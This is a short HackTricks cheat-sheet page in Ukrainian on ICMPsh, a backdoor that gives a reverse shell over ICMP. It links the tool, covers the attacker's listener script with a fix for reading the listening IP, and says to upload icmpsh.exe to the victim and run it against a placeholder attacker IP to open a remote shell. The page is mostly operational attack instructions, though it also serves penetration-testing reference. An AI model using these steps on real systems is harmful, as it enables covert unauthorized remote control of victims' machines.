ICMPsh

Підтримайте HackTricks

Завантажте backdoor з: https://github.com/inquisb/icmpsh

Сторона клієнта

Виконайте скрипт: run.sh

Якщо ви отримуєте помилку, спробуйте змінити рядки:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

Для:

echo Please insert the IP where you want to listen
read IP

Сторона жертви

Завантажте icmpsh.exe на жертву та виконайте:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
Підтримайте HackTricks

Last updated